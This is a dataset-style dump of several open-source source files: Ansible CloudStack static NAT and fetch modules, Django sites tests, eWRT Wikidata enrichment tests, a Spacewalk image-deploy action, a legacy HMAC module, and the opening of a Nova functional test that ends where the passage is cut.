repo_name | path | copies | size | content | license
---|---|---|---|---|---
danieljaouen/ansible | lib/ansible/modules/cloud/cloudstack/cs_staticnat.py | 21 | 6799 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, René Moser <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_staticnat
short_description: Manages static NATs on Apache CloudStack based clouds.
description:
- Create, update and remove static NATs.
version_added: "2.0"
author: "René Moser (@resmo)"
options:
ip_address:
description:
- Public IP address the static NAT is assigned to.
required: true
vm:
description:
- Name of the virtual machine the static NAT is created for.
- Required if I(state=present).
vm_guest_ip:
description:
- VM guest NIC secondary IP address for the static NAT.
network:
description:
- Network the IP address is related to.
version_added: "2.2"
vpc:
description:
- VPC the network is related to.
version_added: "2.3"
state:
description:
- State of the static NAT.
default: present
choices: [ present, absent ]
domain:
description:
- Domain the static NAT is related to.
account:
description:
- Account the static NAT is related to.
project:
description:
- Name of the project the static NAT is related to.
zone:
description:
- Name of the zone the virtual machine is in.
- If not set, default zone is used.
poll_async:
description:
- Poll async jobs until job has finished.
type: bool
default: yes
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
- name: Create a static NAT for IP 1.2.3.4 to web01
local_action:
module: cs_staticnat
ip_address: 1.2.3.4
vm: web01
- name: Remove a static NAT
local_action:
module: cs_staticnat
ip_address: 1.2.3.4
state: absent
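# A hypothetical extra example (not from the original docs), assuming the
# VM has a secondary guest IP and that a network named "customer-net" exists:
- name: Create a static NAT for a secondary guest IP
  local_action:
    module: cs_staticnat
    ip_address: 1.2.3.4
    vm: web01
    vm_guest_ip: 10.101.65.200
    network: customer-net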
'''
RETURN = '''
---
id:
description: UUID of the ip_address.
returned: success
type: string
sample: a6f7a5fc-43f8-11e5-a151-feff819cdc9f
ip_address:
description: Public IP address.
returned: success
type: string
sample: 1.2.3.4
vm_name:
description: Name of the virtual machine.
returned: success
type: string
sample: web-01
vm_display_name:
description: Display name of the virtual machine.
returned: success
type: string
sample: web-01
vm_guest_ip:
description: IP of the virtual machine.
returned: success
type: string
sample: 10.101.65.152
zone:
description: Name of zone the static NAT is related to.
returned: success
type: string
sample: ch-gva-2
project:
description: Name of project the static NAT is related to.
returned: success
type: string
sample: Production
account:
description: Account the static NAT is related to.
returned: success
type: string
sample: example account
domain:
description: Domain the static NAT is related to.
returned: success
type: string
sample: example domain
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_argument_spec,
cs_required_together,
)
class AnsibleCloudStackStaticNat(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackStaticNat, self).__init__(module)
self.returns = {
'virtualmachinedisplayname': 'vm_display_name',
'virtualmachinename': 'vm_name',
'ipaddress': 'ip_address',
'vmipaddress': 'vm_guest_ip',
}
def create_static_nat(self, ip_address):
self.result['changed'] = True
args = {
'virtualmachineid': self.get_vm(key='id'),
'ipaddressid': ip_address['id'],
'vmguestip': self.get_vm_guest_ip(),
'networkid': self.get_network(key='id')
}
if not self.module.check_mode:
self.query_api('enableStaticNat', **args)
# reset ip address and query new values
self.ip_address = None
ip_address = self.get_ip_address()
return ip_address
def update_static_nat(self, ip_address):
args = {
'virtualmachineid': self.get_vm(key='id'),
'ipaddressid': ip_address['id'],
'vmguestip': self.get_vm_guest_ip(),
'networkid': self.get_network(key='id')
}
# make an alias, so we can use has_changed()
ip_address['vmguestip'] = ip_address['vmipaddress']
if self.has_changed(args, ip_address, ['vmguestip', 'virtualmachineid']):
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('disableStaticNat', ipaddressid=ip_address['id'])
self.poll_job(res, 'staticnat')
self.query_api('enableStaticNat', **args)
# reset ip address and query new values
self.ip_address = None
ip_address = self.get_ip_address()
return ip_address
def present_static_nat(self):
ip_address = self.get_ip_address()
if not ip_address['isstaticnat']:
ip_address = self.create_static_nat(ip_address)
else:
ip_address = self.update_static_nat(ip_address)
return ip_address
def absent_static_nat(self):
ip_address = self.get_ip_address()
if ip_address['isstaticnat']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('disableStaticNat', ipaddressid=ip_address['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
self.poll_job(res, 'staticnat')
return ip_address
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
ip_address=dict(required=True),
vm=dict(),
vm_guest_ip=dict(),
network=dict(),
vpc=dict(),
state=dict(choices=['present', 'absent'], default='present'),
zone=dict(),
domain=dict(),
account=dict(),
project=dict(),
poll_async=dict(type='bool', default=True),
))
module = AnsibleModule(
argument_spec=argument_spec,
required_together=cs_required_together(),
supports_check_mode=True
)
acs_static_nat = AnsibleCloudStackStaticNat(module)
state = module.params.get('state')
if state in ['absent']:
ip_address = acs_static_nat.absent_static_nat()
else:
ip_address = acs_static_nat.present_static_nat()
result = acs_static_nat.get_result(ip_address)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
geerlingguy/ansible | lib/ansible/modules/fetch.py | 7 | 3790 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# This is a virtual module that is entirely implemented as an action plugin and runs on the controller
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: fetch
short_description: Fetch files from remote nodes
description:
- This module works like M(copy), but in reverse.
- It is used for fetching files from remote machines and storing them locally in a file tree, organized by hostname.
- Files that already exist at I(dest) will be overwritten if they are different from the I(src).
- This module is also supported for Windows targets.
version_added: '0.2'
options:
src:
description:
- The file on the remote system to fetch.
- This I(must) be a file, not a directory.
- Recursive fetching may be supported in a later release.
required: yes
dest:
description:
- A directory to save the file into.
- For example, if the I(dest) directory is C(/backup), an I(src) file named C(/etc/profile) on host
C(host.example.com) would be saved into C(/backup/host.example.com/etc/profile).
The host name is based on the inventory name.
required: yes
fail_on_missing:
version_added: '1.1'
description:
- When set to C(yes), the task will fail if the remote file cannot be read for any reason.
- Prior to Ansible 2.5, setting this would only fail if the source file was missing.
- The default was changed to C(yes) in Ansible 2.5.
type: bool
default: yes
validate_checksum:
version_added: '1.4'
description:
- Verify that the source and destination checksums match after the files are fetched.
type: bool
default: yes
flat:
version_added: '1.2'
description:
- Allows you to override the default behavior of appending hostname/path/to/file to the destination.
- If C(dest) ends with '/', it will use the basename of the source file, similar to the copy module.
- This can be useful if working with a single host, or if retrieving files that are uniquely named per host.
- If using multiple hosts with the same filename, the file will be overwritten for each host.
type: bool
default: no
notes:
- When running fetch with C(become), the M(slurp) module will also be
used to fetch the contents of the file for determining the remote
checksum. This effectively doubles the transfer size, and
depending on the file size can consume all available memory on the
remote or local hosts causing a C(MemoryError). Due to this it is
advisable to run this module without C(become) whenever possible.
- Prior to Ansible 2.5 this module would not fail if reading the remote
file was impossible unless C(fail_on_missing) was set.
- In Ansible 2.5 or later, playbook authors are encouraged to use
C(failed_when) or C(ignore_errors) to get this ability. They may
also explicitly set C(fail_on_missing) to C(no) to get the
non-failing behaviour.
- This module is also supported for Windows targets.
seealso:
- module: copy
- module: slurp
author:
- Ansible Core Team
- Michael DeHaan
'''
EXAMPLES = r'''
- name: Store file into /tmp/fetched/host.example.com/tmp/somefile
fetch:
src: /tmp/somefile
dest: /tmp/fetched
- name: Specifying a path directly
fetch:
src: /tmp/somefile
dest: /tmp/prefix-{{ inventory_hostname }}
flat: yes
- name: Specifying a destination path
fetch:
src: /tmp/uniquefile
dest: /tmp/special/
flat: yes
- name: Storing in a path relative to the playbook
fetch:
src: /tmp/uniquefile
dest: special/prefix-{{ inventory_hostname }}
flat: yes
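# A hypothetical extra example (not from the original docs): tolerate files
# that are missing on some hosts instead of failing the task
- name: Fetch a log file that may not exist on every host
  fetch:
    src: /var/log/app/optional.log
    dest: /tmp/fetched
    fail_on_missing: no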
'''
| gpl-3.0 |
willharris/django | tests/sites_tests/tests.py | 8 | 8628 | from __future__ import unicode_literals
from django.apps import apps
from django.conf import settings
from django.contrib.sites import models
from django.contrib.sites.management import create_default_site
from django.contrib.sites.middleware import CurrentSiteMiddleware
from django.contrib.sites.models import Site, clear_site_cache
from django.contrib.sites.requests import RequestSite
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db.models.signals import post_migrate
from django.http import HttpRequest
from django.test import TestCase, modify_settings, override_settings
from django.test.utils import captured_stdout
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.sites'})
class SitesFrameworkTests(TestCase):
multi_db = True
def setUp(self):
self.site = Site(
id=settings.SITE_ID,
domain="example.com",
name="example.com",
)
self.site.save()
def test_site_manager(self):
# Make sure that get_current() does not return a deleted Site object.
s = Site.objects.get_current()
self.assertIsInstance(s, Site)
s.delete()
self.assertRaises(ObjectDoesNotExist, Site.objects.get_current)
def test_site_cache(self):
# After updating a Site object (e.g. via the admin), we shouldn't return a
# bogus value from the SITE_CACHE.
site = Site.objects.get_current()
self.assertEqual("example.com", site.name)
s2 = Site.objects.get(id=settings.SITE_ID)
s2.name = "Example site"
s2.save()
site = Site.objects.get_current()
self.assertEqual("Example site", site.name)
def test_delete_all_sites_clears_cache(self):
# When all site objects are deleted the cache should also
# be cleared and get_current() should raise a DoesNotExist.
self.assertIsInstance(Site.objects.get_current(), Site)
Site.objects.all().delete()
self.assertRaises(Site.DoesNotExist, Site.objects.get_current)
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_get_current_site(self):
# Test that the correct Site object is returned
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
site = get_current_site(request)
self.assertIsInstance(site, Site)
self.assertEqual(site.id, settings.SITE_ID)
# Test that an exception is raised if the sites framework is installed
# but there is no matching Site
site.delete()
self.assertRaises(ObjectDoesNotExist, get_current_site, request)
# A RequestSite is returned if the sites framework is not installed
with self.modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'}):
site = get_current_site(request)
self.assertIsInstance(site, RequestSite)
self.assertEqual(site.name, "example.com")
@override_settings(SITE_ID='', ALLOWED_HOSTS=['example.com'])
def test_get_current_site_no_site_id(self):
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
del settings.SITE_ID
site = get_current_site(request)
self.assertEqual(site.name, "example.com")
def test_domain_name_with_whitespaces(self):
# Regression for #17320
# Domain names are not allowed to contain whitespace characters
site = Site(name="test name", domain="test test")
self.assertRaises(ValidationError, site.full_clean)
site.domain = "test\ttest"
self.assertRaises(ValidationError, site.full_clean)
site.domain = "test\ntest"
self.assertRaises(ValidationError, site.full_clean)
def test_clear_site_cache(self):
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
self.assertEqual(models.SITE_CACHE, {})
get_current_site(request)
expected_cache = {self.site.id: self.site}
self.assertEqual(models.SITE_CACHE, expected_cache)
with self.settings(SITE_ID=''):
get_current_site(request)
expected_cache.update({self.site.domain: self.site})
self.assertEqual(models.SITE_CACHE, expected_cache)
clear_site_cache(Site, instance=self.site, using='default')
self.assertEqual(models.SITE_CACHE, {})
@override_settings(SITE_ID='')
def test_clear_site_cache_domain(self):
site = Site.objects.create(name='example2.com', domain='example2.com')
request = HttpRequest()
request.META = {
"SERVER_NAME": "example2.com",
"SERVER_PORT": "80",
}
get_current_site(request) # prime the models.SITE_CACHE
expected_cache = {site.domain: site}
self.assertEqual(models.SITE_CACHE, expected_cache)
# Site exists in 'default' database so using='other' shouldn't clear.
clear_site_cache(Site, instance=site, using='other')
self.assertEqual(models.SITE_CACHE, expected_cache)
# using='default' should clear.
clear_site_cache(Site, instance=site, using='default')
self.assertEqual(models.SITE_CACHE, {})
class JustOtherRouter(object):
def allow_migrate(self, db, app_label, **hints):
return db == 'other'
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.sites'})
class CreateDefaultSiteTests(TestCase):
multi_db = True
def setUp(self):
self.app_config = apps.get_app_config('sites')
# Delete the site created as part of the default migration process.
Site.objects.all().delete()
def test_basic(self):
"""
#15346, #15573 - create_default_site() creates an example site only if
none exist.
"""
with captured_stdout() as stdout:
create_default_site(self.app_config)
self.assertEqual(Site.objects.count(), 1)
self.assertIn("Creating example.com", stdout.getvalue())
with captured_stdout() as stdout:
create_default_site(self.app_config)
self.assertEqual(Site.objects.count(), 1)
self.assertEqual("", stdout.getvalue())
@override_settings(DATABASE_ROUTERS=[JustOtherRouter()])
def test_multi_db_with_router(self):
"""
#16353, #16828 - The default site creation should respect db routing.
"""
create_default_site(self.app_config, using='default', verbosity=0)
create_default_site(self.app_config, using='other', verbosity=0)
self.assertFalse(Site.objects.using('default').exists())
self.assertTrue(Site.objects.using('other').exists())
def test_multi_db(self):
create_default_site(self.app_config, using='default', verbosity=0)
create_default_site(self.app_config, using='other', verbosity=0)
self.assertTrue(Site.objects.using('default').exists())
self.assertTrue(Site.objects.using('other').exists())
def test_save_another(self):
"""
#17415 - Another site can be created right after the default one.
On some backends the sequence needs to be reset after saving with an
explicit ID. Test that there isn't a sequence collision by saving
another site. This test is only meaningful with databases that use
sequences for automatic primary keys such as PostgreSQL and Oracle.
"""
create_default_site(self.app_config, verbosity=0)
Site(domain='example2.com', name='example2.com').save()
def test_signal(self):
"""
#23641 - Sending the ``post_migrate`` signal triggers creation of the
default site.
"""
post_migrate.send(sender=self.app_config, app_config=self.app_config, verbosity=0)
self.assertTrue(Site.objects.exists())
@override_settings(SITE_ID=35696)
def test_custom_site_id(self):
"""
#23945 - The configured ``SITE_ID`` should be respected.
"""
create_default_site(self.app_config, verbosity=0)
self.assertEqual(Site.objects.get().pk, 35696)
class MiddlewareTest(TestCase):
def test_request(self):
""" Makes sure that the request has the correct `site` attribute. """
middleware = CurrentSiteMiddleware()
request = HttpRequest()
middleware.process_request(request)
self.assertEqual(request.site.id, settings.SITE_ID)
| bsd-3-clause |
weblyzard/ewrt | tests/ws/wikidata/test_bundle_wikipedia_requests.py | 1 | 15715 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Created on October 04, 2018
@author: jakob <[email protected]>
'''
from __future__ import print_function
from builtins import next
from builtins import str
from builtins import range
import datetime
import mock
import pytest
from eWRT.ws.wikidata.bundle_wikipedia_requests import collect_multiple_from_wikipedia, \
wikipedia_request_dispatcher, batch_enrich_from_wikipedia
GW_snapshot_wikidata_result = {
u'https://www.wikidata.org/wiki/Q23': {u'frwiki': u'George Washington',
u'position held': {
'url': 'https://www.wikidata.org/wiki/Property:P39',
'values': [{
'url': u'https://www.wikidata.org/wiki/Q11696',
'temporal_attributes': {
'end date': u'+1797-03-04T00:00:00Z',
'start date': u'+1789-04-30T00:00:00Z'},
'labels': {
'de': u'Pr\xe4sident der Vereinigten Staaten',
'en': u'President of the United States',
'fr': u'pr\xe9sident des \xc9tats-Unis',
'es': u'presidente de Estados Unidos'},
'claim_id': u'q23$B6E5D112-C27E-4E3F-BB65-CB12B9364092'},
{
'url': u'https://www.wikidata.org/wiki/Q1115127',
'temporal_attributes': {
'end date': u'+1799-12-14T00:00:00Z',
'start date': u'+1798-07-13T00:00:00Z'},
'labels': {
'de': u'Commanding General of the United States Army',
'en': u'Commanding General of the United States Army',
'fr': u'Commanding General of the United States Army',
'es': u'comandante general del Ej\xe9rcito de los Estados Unidos'},
'claim_id': u'Q23$6A44E261-3592-4928-979B-0BF1CAB2D39C'},
{
'url': u'https://www.wikidata.org/wiki/Q1115127',
'temporal_attributes': {
'end date': u'+1788-12-23T00:00:00Z',
'start date': u'+1775-06-15T00:00:00Z'},
'labels': {
'de': u'Commanding General of the United States Army',
'en': u'Commanding General of the United States Army',
'fr': u'Commanding General of the United States Army',
'es': u'comandante general del Ej\xe9rcito de los Estados Unidos'},
'claim_id': u'Q23$2c113ca2-4177-4a24-eb0c-6c284ff03416'}]},
'wikidata_timestamp': '2018-10-03T00:05:30Z',
'url': u'https://www.wikidata.org/wiki/Q23',
u'date of birth': {
'url': 'https://www.wikidata.org/wiki/Property:P569',
'values': [{
'claim_id': u'Q23$3BF0223A-D656-435B-9FD1-32E0B8F54A69',
'value': u'+1732-02-22T00:00:00Z'}]},
u'dewiki': u'George Washington',
u'eswiki': u'George Washington',
'labels': {
'de': u'George Washington',
'en': u'George Washington',
'fr': u'George Washington',
'es': u'George Washington'},
u'place of birth': {
'url': 'https://www.wikidata.org/wiki/Property:P19',
'values': [{
'url': u'https://www.wikidata.org/wiki/Q495645',
'labels': {
'de': u'Westmoreland County',
'en': u'Westmoreland County',
'fr': u'comt\xe9 de Westmoreland',
'es': u'Condado de Westmoreland'},
'claim_id': u'Q23$ca56ecac-bad6-4d4c-ad29-36a26244955a'}]},
u'enwiki': u'George Washington',
'descriptions': {
'de': u'erster Pr\xe4sident der Vereinigten Staaten von Amerika',
'en': u'first President of the United States',
'fr': u"premier pr\xe9sident des \xc9tats-Unis d'Am\xe9rique",
'es': u'primer presidente de los Estados Unidos de Am\xe9rica'},
'wikidata_id': u'Q23', 'country': {
'url': 'https://www.wikidata.org/wiki/Property:P17', 'values': [
{'url': u'https://www.wikidata.org/wiki/Q30',
'labels': {'de': u'Vereinigte Staaten',
'en': u'United States of America',
'fr': u'\xc9tats-Unis', 'es': u'Estados Unidos'},
'claim_id': u'Q23@q495645$A10AFE59-9C11-40BC-87A5-567221D430AA'}]},
'aliases': {'de': [
u'Pr\xe4sident Washington',
u'G. Washington'],
'en': [u'Washington',
u'President Washington',
u'G. Washington',
u'Father of the United States']}}}
GW_snapshot_wikipedia_result = {
'url': u'https://en.wikipedia.org/wiki/George_Washington',
'timestamp': u'2018-10-04T05:06:49Z',
'title': u'George Washington',
'language': 'en',
'summary': u'George Washington (February 22, 1732 \u2013 December 14, 1799) was '
u'one of the Founding Fathers of the United States and served as '
u'the nation\u2019s first President (1789\u20131797). In the '
u'American Revolutionary War, he commanded Patriot forces to '
u'victory against the British and their allies. He presided over '
u'the Constitutional Convention of 1787 which established the new '
u'federal government, and he has been called the "Father of His '
u'Country".\nWashington was born to a moderately prosperous '
u'Virginian family of colonial planters and slaveholders. He '
u'had early educational opportunities, learned mathematics, '
u'and soon launched a successful career as a surveyor which '
u'enabled him to make significant land investments. He then '
u'joined the Virginia militia and fought in the French and Indian '
u'War. He was appointed commander-in-chief of the Continental Army '
u'during the Revolutionary War, leading an allied campaign to '
u'victory at the Siege of Yorktown which ended the war. His '
u'devotion to Republicanism and revulsion for tyrannical power '
u'impelled him to decline further authority after victory, and '
u'he resigned as commander-in-chief in 1783.\nAs one of the '
u'country\u2019s premier statesmen, Washington was unanimously '
u'elected President by the Electoral College in the first two '
u'national elections. He promoted and oversaw implementation of '
u'a strong, well-financed national government. He remained '
u'impartial in the fierce rivalry between cabinet secretaries '
u'Thomas Jefferson and Alexander Hamilton, although he adopted '
u'Hamilton\'s economic plans. When the French Revolution plunged '
u'Europe into war, Washington assumed a policy of neutrality to '
u'protect American ships\u2014although the controversial Jay '
u'Treaty of 1795 normalized trade relations with Great Britain. '
u'He set precedents still in use today, such as the Cabinet '
u'advisory system, the inaugural address, the title "Mr. '
u'President", and the concept of a two-term office limit. His '
u'Farewell Address strongly warned against political partisanship, '
u'sectionalism, and involvement in foreign wars.\nWashington '
u'inherited slaves at age 11 and officially supported other '
u'slaveholders as late as 1793. He eventually became troubled '
u'with slavery, however, and he freed all his slaves in his will '
u'in 1799. He is widely known for his religious toleration while '
u'his religious beliefs have been thoroughly debated by '
u'historians. Upon his death, Washington was famously eulogized as '
u'"first in war, first in peace, and first in the hearts of his '
u'countrymen". He has been widely memorialized by monuments, art, '
u'places, stamps, and currency, and has been consistently ranked '
u'by scholars among the top American presidents.'}
sitelink_cache = {
'en': {'George Washington': u'https://www.wikidata.org/wiki/Q23'}}
# mock_enrich = mock.Mock()
# mock_enrich.return_value = (el for el in [GW_snapshot_wikipedia_result])
def batch_enrich_mock(title, language):
print(title)
assert (language, title) == ('en', u'George Washington')
return (GW_snapshot_wikipedia_result,)
@mock.patch(
target='eWRT.ws.wikidata.bundle_wikipedia_requests.wikipedia_page_info_from_titles',
new=batch_enrich_mock)
def test_batch_enrich_from_wikipedia():
"""
Using a mock for wikipedia_page_info_from_titles, this test runs fully
offline."""
enrichment_result = batch_enrich_from_wikipedia(
wikipedia_pages=sitelink_cache['en'],
entities_cache=GW_snapshot_wikidata_result,
language='en',
)
merge_result = next(enrichment_result)
assert_basic_structure_as_expected(merge_result)
assert merge_result['enwiki'] == GW_snapshot_wikipedia_result
def test_collect_multiple_from_wikipedia():
global sitelink_cache
enrichment_result = next(collect_multiple_from_wikipedia(
sitelinks_cache=sitelink_cache,
entities_cache=GW_snapshot_wikidata_result
))
try:
# An empty sitelink cache must yield an empty generator, so next()
# should raise StopIteration instead of returning a result.
modified_sitelink_cache = {'de': {}}
enrichment_result = next(collect_multiple_from_wikipedia(
sitelinks_cache=modified_sitelink_cache,
entities_cache=GW_snapshot_wikidata_result
))
raise ValueError
except StopIteration:
pass
def test_enrich_from_wikipedia_offline():
"""
Uses the same mock for wikipedia_page_info_from_titles (applied here as
a context manager), so this test also runs fully offline; the basic
structure and timestamp of the merge result should match the cached
snapshot.
"""
with mock.patch(target='eWRT.ws.wikidata.bundle_wikipedia_requests.wikipedia_page_info_from_titles',
new=batch_enrich_mock):
enrichment_result = next(batch_enrich_from_wikipedia(
wikipedia_pages=sitelink_cache['en'],
entities_cache=GW_snapshot_wikidata_result,
language='en',
))
assert_basic_structure_as_expected(enrichment_result)
assert GW_snapshot_wikipedia_result['timestamp'] == enrichment_result['enwiki']['timestamp']
def assert_basic_structure_as_expected(merged_result):
"""
Check whether the basic structure and keys included are as expected.
:param merged_result:
:return:
"""
assert isinstance(merged_result, dict)
assert merged_result['language'] == 'en'
other_language_wikis = ('dewiki', 'frwiki', 'eswiki')
# assert all([key not in merged_result for key in other_language_wikis])
assert merged_result['labels'] == 'George Washington'
assert all([key in merged_result['enwiki'] for key in
GW_snapshot_wikipedia_result])
assert isinstance(merged_result['enwiki'], dict)
wiki_timestamp = merged_result['enwiki']['timestamp']
try:
datetime.datetime.strptime(wiki_timestamp, u'%Y-%m-%dT%H:%M:%SZ')
except ValueError:
raise ValueError('Timestamp doesn\'t appear to be a valid time. '
'Timestamp returned was: {}, expected format {}'.format(
wiki_timestamp,
datetime.datetime.now().strftime(u'%Y-%m-%dT%H:%M:%SZ')))
assert u'2018-10-04T05:06:49Z' <= merged_result['enwiki'][
'timestamp'] < datetime.datetime.now().strftime(u'%Y-%m-%dT%H:%M:%SZ')
# todo: add test for similarity of retrieved summary with snapshot?
batch_calls = 0
def mock_batch_enrich(*args, **kwargs):
"""generator that yields 20 entities at a time, for no more than a
total of 100"""
global batch_calls
batch_calls += 1
if batch_calls > 5:
return  # ends the generator; raising StopIteration here is a RuntimeError under PEP 479
for i in range(20):
yield {}
@mock.patch(
target='eWRT.ws.wikidata.bundle_wikipedia_requests.batch_enrich_from_wikipedia',
new=mock_batch_enrich)
@pytest.mark.skip
def test_wikipedia_request_dispatcher():
sitelink_cache = {'en': {str(i): i for i in range(100)}}
results = wikipedia_request_dispatcher(sitelinks_cache=sitelink_cache,
entity_cache=GW_snapshot_wikidata_result,
languages=['en'])
returned = [result for result in results]
assert returned
assert len(returned) >= 100
| gpl-3.0 |
Pajinek/spacewalk | backend/server/action/image.py | 14 | 1837 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2011 SUSE LLC
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
from spacewalk.common.rhnLog import log_debug
from spacewalk.server import rhnSQL
from spacewalk.server.rhnLib import InvalidAction
# the "exposed" functions
__rhnexport__ = ['deploy']
# returns the values needed for deploying a virtual machine with an image
#
# downloadURL, proxySettings, memKB, vCPUs, domainName, virtBridge
#
def deploy(serverId, actionId, dry_run=0):
log_debug(3)
statement = """
select aid.mem_kb, aid.vcpus, aid.bridge_device,aid.download_url,
aid.proxy_server, aid.proxy_user, aid.proxy_pass
from rhnActionImageDeploy aid
where aid.action_id = :action_id"""
h = rhnSQL.prepare(statement)
h.execute(action_id=actionId)
row = h.fetchone_dict()
if not row:
# No image for this action
raise InvalidAction("image.deploy: No image found for action id "
"%s and server %s" % (actionId, serverId))
for key in ['download_url', 'proxy_server', 'proxy_user', 'proxy_pass', 'bridge_device']:
if row[key] is None:
row[key] = ""
params = {
"downloadURL": row['download_url'],
"proxySettings": {"proxyURL": row['proxy_server'], "proxyUser": row['proxy_user'], "proxyPass": row['proxy_pass']},
"memKB": row['mem_kb'],
"vCPUs": row['vcpus'],
"domainName": "",
"virtBridge": row['bridge_device']}
return (params)
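# Illustrative sketch (not part of the original module) of the structure
# deploy() returns; the values below are made up:
#
#   {"downloadURL": "http://example.org/images/vm.qcow2",
#    "proxySettings": {"proxyURL": "", "proxyUser": "", "proxyPass": ""},
#    "memKB": 524288, "vCPUs": 2, "domainName": "", "virtBridge": "br0"}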
| gpl-2.0 |
pleaseproject/python-for-android | python3-alpha/extra_modules/gdata/Crypto/Hash/HMAC.py | 45 | 3337 | """HMAC (Keyed-Hashing for Message Authentication) Python module.
Implements the HMAC algorithm as described by RFC 2104.
This is just a copy of the Python 2.2 HMAC module, modified to work when
used on versions of Python before 2.2.
"""
__revision__ = "$Id: HMAC.py,v 1.5 2002/07/25 17:19:02 z3p Exp $"
import string
def _strxor(s1, s2):
"""Utility method. XOR the two strings s1 and s2 (must have same length).
"""
return "".join(map(lambda x, y: chr(ord(x) ^ ord(y)), s1, s2))
# The size of the digests returned by HMAC depends on the underlying
# hashing module used.
digest_size = None
class HMAC:
"""RFC2104 HMAC class.
This supports the API for Cryptographic Hash Functions (PEP 247).
"""
def __init__(self, key, msg = None, digestmod = None):
"""Create a new HMAC object.
key: key for the keyed hash object.
msg: Initial input for the hash, if provided.
digestmod: A module supporting PEP 247. Defaults to the md5 module.
"""
if digestmod is None:
from . import md5
digestmod = md5
self.digestmod = digestmod
self.outer = digestmod.new()
self.inner = digestmod.new()
try:
self.digest_size = digestmod.digest_size
except AttributeError:
self.digest_size = len(self.outer.digest())
blocksize = 64
ipad = "\x36" * blocksize
opad = "\x5C" * blocksize
if len(key) > blocksize:
key = digestmod.new(key).digest()
key = key + chr(0) * (blocksize - len(key))
self.outer.update(_strxor(key, opad))
self.inner.update(_strxor(key, ipad))
if (msg):
self.update(msg)
## def clear(self):
## raise NotImplementedError, "clear() method not available in HMAC."
def update(self, msg):
"""Update this hashing object with the string msg.
"""
self.inner.update(msg)
def copy(self):
"""Return a separate copy of this hashing object.
An update to this copy won't affect the original object.
"""
other = HMAC("")
other.digestmod = self.digestmod
other.inner = self.inner.copy()
other.outer = self.outer.copy()
return other
def digest(self):
"""Return the hash value of this hashing object.
This returns a string containing 8-bit data. The object is
not altered in any way by this function; you can continue
updating the object after calling this function.
"""
h = self.outer.copy()
h.update(self.inner.digest())
return h.digest()
def hexdigest(self):
"""Like digest(), but returns a string of hexadecimal digits instead.
"""
return "".join([string.zfill(hex(ord(x))[2:], 2)
for x in tuple(self.digest())])
def new(key, msg = None, digestmod = None):
"""Create a new hashing object and return it.
key: The starting key for the hash.
msg: if available, will immediately be hashed into the object's starting
state.
You can now feed arbitrary strings into the object using its update()
method, and can ask for the hash value at any time by calling its digest()
method.
"""
return HMAC(key, msg, digestmod)
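# --- Usage sketch (illustrative, not part of the original module) ---
# Assuming the bundled md5 module is importable alongside this file:
#
#   from . import md5
#   mac = new("secret-key", "message", digestmod=md5)
#   mac.update(" more data")
#   print(mac.hexdigest())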
| apache-2.0 |
akash1808/nova | nova/tests/functional/v3/test_extended_server_attributes.py | 28 | 2687 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.tests.functional.v3 import test_servers
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.extensions')
class ExtendedServerAttributesJsonTest(test_servers.ServersSampleBase):
extension_name = "os-extended-server-attributes"
extra_extensions_to_load = ["os-access-ips"]
_api_version = 'v2'
def _get_flags(self):
f = super(ExtendedServerAttributesJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.keypairs.Keypairs')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_ips.Extended_ips')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_ips_mac.'
'Extended_ips_mac')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_server_attributes.'
'Extended_server_attributes')
return f
def test_show(self):
uuid = self._post_server()
response = self._do_get('servers/%s' % uuid)
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['id'] = uuid
subs['instance_name'] = r'instance-\d{8}'
subs['hypervisor_hostname'] = r'[\w\.\-]+'
subs['access_ip_v4'] = '1.2.3.4'
